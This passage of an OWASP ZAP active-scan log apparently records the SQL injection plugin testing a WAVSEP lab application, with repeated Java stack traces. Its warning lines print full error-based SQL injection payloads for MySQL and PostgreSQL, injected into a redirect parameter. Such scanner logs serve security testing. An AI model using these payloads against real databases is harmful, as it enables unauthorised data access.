org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681637 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 9328 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9328=9328,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 9328 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9328=9328,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681637 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 8824=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8824=8824) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (8133=8133] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 8824=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8824=8824) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (8133=8133 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681638 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 2021=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2021=2021) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 2021=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2021=2021) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681639 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 4143 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4143=4143,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- FYWG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 4143 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4143=4143,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- FYWG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681640 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 4801=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4801=4801) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('rjiG'='rjiG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 4801=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4801=4801) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('rjiG'='rjiG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681640 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8340=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8340=8340) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (8772=8772] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8340=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8340=8340) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (8772=8772 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681641 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4795=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4795=4795) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4795=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4795=4795) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681642 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 6149=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6149=6149) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'tRie'='tRie] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 6149=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6149=6149) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'tRie'='tRie at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681642 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7255=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7255=7255) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('OnPM'='OnPM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7255=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7255=7255) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('OnPM'='OnPM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681643 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 2029=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2029=2029) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 2029=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2029=2029) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681644 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5141=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5141=5141) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'kSrh'='kSrh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5141=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5141=5141) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'kSrh'='kSrh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681645 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 1812=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1812=1812) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- SGVO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 1812=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1812=1812) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- SGVO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at 